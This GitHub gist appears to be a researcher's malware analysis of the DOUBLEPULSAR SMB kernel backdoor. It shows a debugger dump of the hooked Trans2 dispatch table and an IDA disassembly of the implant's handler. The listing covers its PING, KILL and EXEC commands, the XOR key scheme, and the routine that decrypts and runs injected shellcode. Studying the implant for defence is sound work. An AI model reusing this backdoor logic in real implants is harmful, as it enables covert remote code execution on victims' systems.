Created
April 23, 2017 09:45
-
-
Save msuiche/50a36710ee59709d8c76fa50fc987be1 to your computer and use it in GitHub Desktop.
DOUBLEPULSAR - ETERNALBLUE - SmbHandler()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Thanks to https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html#pulsar_step5 for the description | |
kd> dps srv!SrvTransaction2DispatchTable | |
91463530 9148b56f srv!SrvSmbOpen2 | |
91463534 91485fe4 srv!SrvSmbFindFirst2 | |
91463538 9148606d srv!SrvSmbFindNext2 | |
9146353c 91488a89 srv!SrvSmbQueryFsInformation | |
91463540 914892f3 srv!SrvSmbSetFsInformation | |
91463544 9147ff65 srv!SrvSmbQueryPathInformation | |
91463548 91480c74 srv!SrvSmbSetPathInformation | |
9146354c 9147f77c srv!SrvSmbQueryFileInformation | |
91463550 9148055d srv!SrvSmbSetFileInformation | |
91463554 914894e5 srv!SrvSmbFindNotify | |
91463558 9148697a srv!SrvSmbIoctl2 | |
9146355c 914894e5 srv!SrvSmbFindNotify | |
91463560 914894e5 srv!SrvSmbFindNotify | |
91463564 914815fb srv!SrvSmbCreateDirectory2 | |
91463568 83f9f048 <==== | |
9146356c 9148bf2b srv!SrvTransactionNotImplemented | |
91463570 91472107 srv!SrvSmbGetDfsReferral | |
91463574 91471ff7 srv!SrvSmbReportDfsInconsistency | |
91463578 00000000 | |
.rdata:0041ACF5 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 SmbDoublePulsarHandler proc near | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 var_4 = dword ptr -4 | |
.rdata:0041ACF5 arg_4 = dword ptr 8 | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 mov ecx, [esp+arg_4] | |
.rdata:0041ACF9 pusha | |
.rdata:0041ACFA call $+5 | |
.rdata:0041ACFF pop ebp | |
.rdata:0041AD00 and bp, 0F000h | |
.rdata:0041AD05 mov [ebp+34h], ecx | |
.rdata:0041AD08 call sub_41AEE6 | |
.rdata:0041AD0D call sub_41AE55 | |
.rdata:0041AD12 call sub_41AE96 | |
.rdata:0041AD17 test eax, eax | |
.rdata:0041AD19 jz loc_41AE02 | |
.rdata:0041AD1F mov ebx, [ebp+3Ch] | |
.rdata:0041AD22 mov ecx, [ebx-28h] | |
.rdata:0041AD25 call sub_41AE41 | |
.rdata:0041AD2A cmp al, 23h ; PING | |
.rdata:0041AD2C jz short CMD_PING | |
.rdata:0041AD2E cmp al, 77h ; KILL | |
.rdata:0041AD30 jz short CMD_KILL | |
.rdata:0041AD32 cmp al, 0C8h ; EXEC | |
.rdata:0041AD34 jz short CMD_EXEC | |
.rdata:0041AD36 jmp CMD_INVALID | |
.rdata:0041AD3B ; --------------------------------------------------------------------------- | |
.rdata:0041AD3B | |
.rdata:0041AD3B CMD_PING: ; CODE XREF: SmbDoublePulsarHandler+37j | |
.rdata:0041AD3B mov ecx, [ebp+38h] | |
.rdata:0041AD3E mov eax, [ebp+24h] | |
.rdata:0041AD41 mov [ecx+0Eh], eax | |
.rdata:0041AD44 xor eax, eax | |
.rdata:0041AD46 mov [ecx+12h], al | |
.rdata:0041AD49 jmp PING | |
.rdata:0041AD4E ; --------------------------------------------------------------------------- | |
.rdata:0041AD4E | |
.rdata:0041AD4E CMD_KILL: ; CODE XREF: SmbDoublePulsarHandler+3Bj | |
.rdata:0041AD4E call EraseCode | |
.rdata:0041AD53 jmp KILL | |
.rdata:0041AD58 ; --------------------------------------------------------------------------- | |
.rdata:0041AD58 | |
.rdata:0041AD58 CMD_EXEC: ; CODE XREF: SmbDoublePulsarHandler+3Fj | |
.rdata:0041AD58 mov ebx, [ebp+3Ch] | |
.rdata:0041AD5B mov eax, [ebx-18h] | |
.rdata:0041AD5E mov esi, [eax] | |
.rdata:0041AD60 xor esi, [ebp+28h] | |
.rdata:0041AD63 mov edi, [eax+8] | |
.rdata:0041AD66 xor edi, [ebp+28h] | |
.rdata:0041AD69 mov eax, [eax+4] | |
.rdata:0041AD6C xor eax, [ebp+28h] | |
.rdata:0041AD6F cmp eax, [ebx+10h] | |
.rdata:0041AD72 mov ebx, eax | |
.rdata:0041AD74 jnz short CMD_INVALID | |
.rdata:0041AD76 mov ecx, [ebp+30h] | |
.rdata:0041AD79 cmp ecx, esi | |
.rdata:0041AD7B mov eax, [ebp+2Ch] | |
.rdata:0041AD7E jz short loc_41AD98 | |
.rdata:0041AD80 call sub_41AE77 | |
.rdata:0041AD85 lea eax, [esi+4] | |
.rdata:0041AD88 push eax | |
.rdata:0041AD89 push 0 | |
.rdata:0041AD8B call dword ptr [ebp+8] | |
.rdata:0041AD8E test eax, eax | |
.rdata:0041AD90 jz short loc_41ADF5 | |
.rdata:0041AD92 mov [ebp+2Ch], eax | |
.rdata:0041AD95 mov [ebp+30h], esi | |
.rdata:0041AD98 | |
.rdata:0041AD98 loc_41AD98: ; CODE XREF: SmbDoublePulsarHandler+89j | |
.rdata:0041AD98 add edi, ebx | |
.rdata:0041AD9A cmp edi, esi | |
.rdata:0041AD9C ja short CMD_INVALID | |
.rdata:0041AD9E sub edi, ebx | |
.rdata:0041ADA0 add edi, eax | |
.rdata:0041ADA2 push edi | |
.rdata:0041ADA3 mov edx, esi | |
.rdata:0041ADA5 mov esi, [ebp+3Ch] | |
.rdata:0041ADA8 mov esi, [esi-10h] | |
.rdata:0041ADAB mov ecx, ebx | |
.rdata:0041ADAD rep movsb | |
.rdata:0041ADAF pop esi | |
.rdata:0041ADB0 mov ecx, ebx | |
.rdata:0041ADB2 shr ecx, 2 | |
.rdata:0041ADB5 mov ebx, [ebp+28h] | |
.rdata:0041ADB8 | |
.rdata:0041ADB8 loc_41ADB8: ; CODE XREF: SmbDoublePulsarHandler+C8j | |
.rdata:0041ADB8 xor [esi], ebx | |
.rdata:0041ADBA add esi, 4 | |
.rdata:0041ADBD loop loc_41ADB8 | |
.rdata:0041ADBF add eax, edx | |
.rdata:0041ADC1 cmp esi, eax | |
.rdata:0041ADC3 jl short PING | |
.rdata:0041ADC5 mov eax, [ebp+2Ch] | |
.rdata:0041ADC8 pusha | |
.rdata:0041ADC9 mov esi, esp | |
.rdata:0041ADCB push eax | |
.rdata:0041ADCC call eax | |
.rdata:0041ADCE mov esp, esi | |
.rdata:0041ADD0 popa | |
.rdata:0041ADD1 call sub_41AE77 | |
.rdata:0041ADD6 mov eax, [ebp+24h] | |
.rdata:0041ADD9 shr eax, 1 | |
.rdata:0041ADDB xor ecx, ecx | |
.rdata:0041ADDD mov cl, al | |
.rdata:0041ADDF add ecx, ebp | |
.rdata:0041ADE1 mov ecx, [ecx] | |
.rdata:0041ADE3 xor eax, ecx | |
.rdata:0041ADE5 mov [ebp+24h], eax | |
.rdata:0041ADE8 call sub_41AE55 | |
.rdata:0041ADED | |
.rdata:0041ADED PING: ; CODE XREF: SmbDoublePulsarHandler+54j | |
.rdata:0041ADED ; SmbDoublePulsarHandler+CEj | |
.rdata:0041ADED mov al, 10h | |
.rdata:0041ADEF jmp short CleanUp | |
.rdata:0041ADF1 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF1 | |
.rdata:0041ADF1 CMD_INVALID: ; CODE XREF: SmbDoublePulsarHandler+41j | |
.rdata:0041ADF1 ; SmbDoublePulsarHandler+7Fj ... | |
.rdata:0041ADF1 mov al, 20h | |
.rdata:0041ADF3 jmp short CleanUp | |
.rdata:0041ADF5 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF5 | |
.rdata:0041ADF5 loc_41ADF5: ; CODE XREF: SmbDoublePulsarHandler+9Bj | |
.rdata:0041ADF5 mov al, 30h | |
.rdata:0041ADF7 jmp short $+2 | |
.rdata:0041ADF9 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF9 | |
.rdata:0041ADF9 CleanUp: ; CODE XREF: SmbDoublePulsarHandler+FAj | |
.rdata:0041ADF9 ; SmbDoublePulsarHandler+FEj ... | |
.rdata:0041ADF9 mov ecx, [ebp+38h] | |
.rdata:0041ADFC mov ah, 0 | |
.rdata:0041ADFE add [ecx+1Eh], ax | |
.rdata:0041AE02 | |
.rdata:0041AE02 loc_41AE02: ; CODE XREF: SmbDoublePulsarHandler+24j | |
.rdata:0041AE02 mov eax, [ebp+10h] | |
.rdata:0041AE05 mov [esp+20h+var_4], eax | |
.rdata:0041AE09 popa | |
.rdata:0041AE0A jmp dword ptr [eax+3Ch] | |
.rdata:0041AE0D ; --------------------------------------------------------------------------- | |
.rdata:0041AE0D | |
.rdata:0041AE0D KILL: ; CODE XREF: SmbDoublePulsarHandler+5Ej | |
.rdata:0041AE0D lea eax, [ebp+48h] | |
.rdata:0041AE10 mov ecx, [ebp+0Ch] | |
.rdata:0041AE13 mov [eax+147h], ecx | |
.rdata:0041AE19 mov [eax+13Eh], ebp | |
.rdata:0041AE1F mov ax, 10h | |
.rdata:0041AE23 mov ecx, [ebp+38h] | |
.rdata:0041AE26 add [ecx+1Eh], ax | |
.rdata:0041AE2A mov eax, [ebp+10h] | |
.rdata:0041AE2D mov [esp+20h+var_4], eax | |
.rdata:0041AE31 popa | |
.rdata:0041AE32 push 0 | |
.rdata:0041AE37 mov eax, [eax+3Ch] | |
.rdata:0041AE3A push eax | |
.rdata:0041AE3B push 0 | |
.rdata:0041AE40 retn | |
.rdata:0041AE40 SmbDoublePulsarHandler endp | |
.rdata:0041AE40 | |
.rdata:0041AE41 | |
.rdata:0041AE41 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE41 | |
.rdata:0041AE41 | |
.rdata:0041AE41 sub_41AE41 proc near ; CODE XREF: SmbDoublePulsarHandler+30p | |
.rdata:0041AE41 xor eax, eax | |
.rdata:0041AE43 mov al, cl | |
.rdata:0041AE45 shr ecx, 8 | |
.rdata:0041AE48 add al, cl | |
.rdata:0041AE4A shr ecx, 8 | |
.rdata:0041AE4D add al, cl | |
.rdata:0041AE4F shr ecx, 8 | |
.rdata:0041AE52 add al, cl | |
.rdata:0041AE54 retn | |
.rdata:0041AE54 sub_41AE41 endp | |
.rdata:0041AE54 | |
.rdata:0041AE55 | |
.rdata:0041AE55 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE55 | |
.rdata:0041AE55 | |
.rdata:0041AE55 sub_41AE55 proc near ; CODE XREF: SmbDoublePulsarHandler+18p | |
.rdata:0041AE55 ; SmbDoublePulsarHandler+F3p | |
.rdata:0041AE55 push ecx | |
.rdata:0041AE56 mov eax, [ebp+24h] | |
.rdata:0041AE59 mov ecx, eax | |
.rdata:0041AE5B bswap ecx | |
.rdata:0041AE5D shl eax, 1 | |
.rdata:0041AE5F xor eax, ecx | |
.rdata:0041AE61 mov [ebp+28h], eax | |
.rdata:0041AE64 pop ecx | |
.rdata:0041AE65 retn | |
.rdata:0041AE65 sub_41AE55 endp | |
.rdata:0041AE65 | |
.rdata:0041AE66 | |
.rdata:0041AE66 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE66 | |
.rdata:0041AE66 | |
.rdata:0041AE66 EraseCode proc near ; CODE XREF: SmbDoublePulsarHandler:CMD_KILLp | |
.rdata:0041AE66 pusha | |
.rdata:0041AE67 call sub_41AE77 | |
.rdata:0041AE6C mov eax, [ebp+10h] | |
.rdata:0041AE6F mov ecx, [eax+3Ch] | |
.rdata:0041AE72 mov [eax+38h], ecx | |
.rdata:0041AE75 popa | |
.rdata:0041AE76 retn | |
.rdata:0041AE76 EraseCode endp | |
.rdata:0041AE76 | |
.rdata:0041AE77 | |
.rdata:0041AE77 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE77 | |
.rdata:0041AE77 | |
.rdata:0041AE77 sub_41AE77 proc near ; CODE XREF: SmbDoublePulsarHandler+8Bp | |
.rdata:0041AE77 ; SmbDoublePulsarHandler+DCp ... | |
.rdata:0041AE77 pusha | |
.rdata:0041AE78 mov ebx, [ebp+2Ch] | |
.rdata:0041AE7B test ebx, ebx | |
.rdata:0041AE7D jz short loc_41AE8C | |
.rdata:0041AE7F xor eax, eax | |
.rdata:0041AE81 mov edi, ebx | |
.rdata:0041AE83 mov ecx, [ebp+30h] | |
.rdata:0041AE86 rep stosb | |
.rdata:0041AE88 push ebx | |
.rdata:0041AE89 call dword ptr [ebp+0Ch] | |
.rdata:0041AE8C | |
.rdata:0041AE8C loc_41AE8C: ; CODE XREF: sub_41AE77+6j | |
.rdata:0041AE8C xor eax, eax | |
.rdata:0041AE8E mov [ebp+30h], eax | |
.rdata:0041AE91 mov [ebp+2Ch], eax | |
.rdata:0041AE94 popa | |
.rdata:0041AE95 retn | |
.rdata:0041AE95 sub_41AE77 endp | |
.rdata:0041AE95 | |
.rdata:0041AE96 | |
.rdata:0041AE96 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE96 | |
.rdata:0041AE96 | |
.rdata:0041AE96 sub_41AE96 proc near ; CODE XREF: SmbDoublePulsarHandler+1Dp | |
.rdata:0041AE96 push edi | |
.rdata:0041AE97 push edx | |
.rdata:0041AE98 push esi | |
.rdata:0041AE99 mov edi, ecx | |
.rdata:0041AE9B mov edx, [ebp+44h] | |
.rdata:0041AE9E mov ecx, [edx] | |
.rdata:0041AEA0 call sub_41AEDE | |
.rdata:0041AEA5 test eax, eax | |
.rdata:0041AEA7 jnz short loc_41AEB7 | |
.rdata:0041AEA9 add edx, 8 | |
.rdata:0041AEAC mov ecx, [edx] | |
.rdata:0041AEAE call sub_41AEDE | |
.rdata:0041AEB3 test eax, eax | |
.rdata:0041AEB5 jz short loc_41AED8 | |
.rdata:0041AEB7 | |
.rdata:0041AEB7 loc_41AEB7: ; CODE XREF: sub_41AE96+11j | |
.rdata:0041AEB7 mov [ebp+44h], ecx | |
.rdata:0041AEBA push 0Ch | |
.rdata:0041AEBC pop eax | |
.rdata:0041AEBD lea esi, [ecx+54h] | |
.rdata:0041AEC0 cmp eax, [esi] | |
.rdata:0041AEC2 jz short loc_41AECB | |
.rdata:0041AEC4 add esi, 4 | |
.rdata:0041AEC7 cmp eax, [esi] | |
.rdata:0041AEC9 jnz short loc_41AED8 | |
.rdata:0041AECB | |
.rdata:0041AECB loc_41AECB: ; CODE XREF: sub_41AE96+2Cj | |
.rdata:0041AECB cmp eax, [esi+4] | |
.rdata:0041AECE jnz short loc_41AED8 | |
.rdata:0041AED0 mov [ebp+3Ch], esi | |
.rdata:0041AED3 xor eax, eax | |
.rdata:0041AED5 inc eax | |
.rdata:0041AED6 jmp short loc_41AEDA | |
.rdata:0041AED8 ; --------------------------------------------------------------------------- | |
.rdata:0041AED8 | |
.rdata:0041AED8 loc_41AED8: ; CODE XREF: sub_41AE96+1Fj | |
.rdata:0041AED8 ; sub_41AE96+33j ... | |
.rdata:0041AED8 xor eax, eax | |
.rdata:0041AEDA | |
.rdata:0041AEDA loc_41AEDA: ; CODE XREF: sub_41AE96+40j | |
.rdata:0041AEDA pop esi | |
.rdata:0041AEDB pop edx | |
.rdata:0041AEDC pop edi | |
.rdata:0041AEDD retn | |
.rdata:0041AEDD sub_41AE96 endp | |
.rdata:0041AEDD | |
.rdata:0041AEDE | |
.rdata:0041AEDE ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AEDE | |
.rdata:0041AEDE | |
.rdata:0041AEDE sub_41AEDE proc near ; CODE XREF: sub_41AE96+Ap | |
.rdata:0041AEDE ; sub_41AE96+18p | |
.rdata:0041AEDE xor eax, eax | |
.rdata:0041AEE0 cmp ecx, eax | |
.rdata:0041AEE2 jge short locret_41AEE5 | |
.rdata:0041AEE4 inc eax | |
.rdata:0041AEE5 | |
.rdata:0041AEE5 locret_41AEE5: ; CODE XREF: sub_41AEDE+4j | |
.rdata:0041AEE5 retn | |
.rdata:0041AEE5 sub_41AEDE endp | |
.rdata:0041AEE5 | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 sub_41AEE6 proc near ; CODE XREF: SmbDoublePulsarHandler+13p | |
.rdata:0041AEE6 push edx | |
.rdata:0041AEE7 push ecx | |
.rdata:0041AEE8 xor edx, edx | |
.rdata:0041AEEA mov dx, [ecx+2] | |
.rdata:0041AEEE add edx, ecx | |
.rdata:0041AEF0 | |
.rdata:0041AEF0 loc_41AEF0: ; CODE XREF: sub_41AEE6+11j | |
.rdata:0041AEF0 cmp edx, [ecx] | |
.rdata:0041AEF2 jz short loc_41AEF9 | |
.rdata:0041AEF4 add ecx, 4 | |
.rdata:0041AEF7 jmp short loc_41AEF0 | |
.rdata:0041AEF9 ; --------------------------------------------------------------------------- | |
.rdata:0041AEF9 | |
.rdata:0041AEF9 loc_41AEF9: ; CODE XREF: sub_41AEE6+Cj | |
.rdata:0041AEF9 pop edx | |
.rdata:0041AEFA lea eax, [ecx+1Ch] | |
.rdata:0041AEFD add eax, 7 | |
.rdata:0041AF00 and al, 0F8h | |
.rdata:0041AF02 mov [ebp+44h], eax | |
.rdata:0041AF05 mov eax, [ecx-8] | |
.rdata:0041AF08 mov [ebp+38h], eax | |
.rdata:0041AF0B mov ecx, edx | |
.rdata:0041AF0D pop edx | |
.rdata:0041AF0E retn | |
.rdata:0041AF0E sub_41AEE6 endp | |
.rdata:0041AF0E |
Author
msuiche
commented
Apr 23, 2017
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment